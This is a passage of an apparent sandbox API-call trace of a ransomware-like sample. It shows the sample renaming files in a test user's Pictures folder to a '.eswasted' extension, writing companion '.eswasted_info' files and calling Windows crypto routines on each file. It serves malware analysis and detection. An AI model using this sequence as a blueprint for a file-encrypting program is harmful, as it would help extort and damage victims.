hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.680] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\Q_GqjPD6AynM.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\q_gqjpd6aynm.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.681] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.682] SetEndOfFile (hFile=0x110) returned 1 [0080.682] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.682] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.682] lstrcpyW (in: lpString1=0x4cb572, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\Q_GqjPD6AynM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\q_gqjpd6aynm.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\Q_GqjPD6AynM.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\q_gqjpd6aynm.png.eswasted")) returned 1 [0080.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\Q_GqjPD6AynM.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\q_gqjpd6aynm.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.683] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.684] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.685] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.685] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.685] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.686] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.686] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.694] SetEndOfFile (hFile=0x110) returned 1 [0080.696] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.696] CloseHandle (hObject=0x110) returned 1 [0080.698] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb4e0 | out: hHeap=0x4a0000) returned 1 [0080.698] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.699] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.699] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\taNm81mPMaCpeNXGHxC.jpg") returned 80 [0080.699] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f6210 [0080.699] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.699] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.699] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.700] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.700] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\taNm81mPMaCpeNXGHxC.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\tanm81mpmacpenxghxc.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.700] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.701] SetEndOfFile (hFile=0x110) returned 1 [0080.701] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.702] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.702] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\taNm81mPMaCpeNXGHxC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\tanm81mpmacpenxghxc.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\taNm81mPMaCpeNXGHxC.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\tanm81mpmacpenxghxc.jpg.eswasted")) returned 1 [0080.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\taNm81mPMaCpeNXGHxC.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\tanm81mpmacpenxghxc.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.703] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.706] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.707] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.707] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.707] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.707] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.707] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.850] SetEndOfFile (hFile=0x110) returned 1 [0080.853] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.853] CloseHandle (hObject=0x110) returned 1 [0080.890] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0080.890] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.941] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.941] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.942] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Ryn1Z.png") returned 60 [0080.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x282) returned 0x4ef440 [0080.942] lstrcpyW (in: lpString1=0x4ef4b8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.942] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.943] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.943] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Ryn1Z.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ryn1z.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.943] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.944] SetEndOfFile (hFile=0x110) returned 1 [0080.945] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.945] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.945] lstrcpyW (in: lpString1=0x4ef4b8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Ryn1Z.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ryn1z.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Ryn1Z.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ryn1z.png.eswasted")) returned 1 [0080.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Ryn1Z.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ryn1z.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.945] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0080.947] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.947] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.947] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.947] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.948] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.948] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.956] SetEndOfFile (hFile=0x110) returned 1 [0080.959] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.959] CloseHandle (hObject=0x110) returned 1 [0081.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.008] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.009] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.009] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.009] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\GOZj8CdCe-3.png") returned 78 [0081.009] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4d91a8 [0081.009] lstrcpyW (in: lpString1=0x4d9244, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.009] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.009] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.010] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.010] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\GOZj8CdCe-3.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\gozj8cdce-3.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.011] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.012] SetEndOfFile (hFile=0x110) returned 1 [0081.012] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.012] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.012] lstrcpyW (in: lpString1=0x4d9244, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\GOZj8CdCe-3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\gozj8cdce-3.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\GOZj8CdCe-3.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\gozj8cdce-3.png.eswasted")) returned 1 [0081.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\GOZj8CdCe-3.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\gozj8cdce-3.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.013] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0081.016] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.017] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.017] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.017] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.018] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.018] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.029] SetEndOfFile (hFile=0x110) returned 1 [0081.032] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.032] CloseHandle (hObject=0x110) returned 1 [0081.034] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.034] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.035] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.035] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\p 8OU- 6j.bmp") returned 76 [0081.035] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d91a8 [0081.035] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.035] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.035] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.036] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.036] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\p 8OU- 6j.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\p 8ou- 6j.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.037] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.039] SetEndOfFile (hFile=0x110) returned 1 [0081.039] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.039] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.039] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\p 8OU- 6j.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\p 8ou- 6j.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\p 8OU- 6j.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\p 8ou- 6j.bmp.eswasted")) returned 1 [0081.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\p 8OU- 6j.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\p 8ou- 6j.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.040] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.086] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.086] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef690 | out: pbBuffer=0x4ef690) returned 1 [0081.087] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.087] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.087] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.088] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.098] SetEndOfFile (hFile=0x110) returned 1 [0081.101] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.101] CloseHandle (hObject=0x110) returned 1 [0081.103] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.103] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.108] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.108] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.108] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\6HykKJsYIk6R.gif") returned 118 [0081.108] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f6) returned 0x4ef648 [0081.108] lstrcpyW (in: lpString1=0x4ef734, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.108] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.108] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.109] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.109] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\6HykKJsYIk6R.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\6hykkjsyik6r.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.110] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.111] SetEndOfFile (hFile=0x110) returned 1 [0081.112] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.112] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.112] lstrcpyW (in: lpString1=0x4ef734, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\6HykKJsYIk6R.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\6hykkjsyik6r.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\6HykKJsYIk6R.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\6hykkjsyik6r.gif.eswasted")) returned 1 [0081.113] CreateFileW 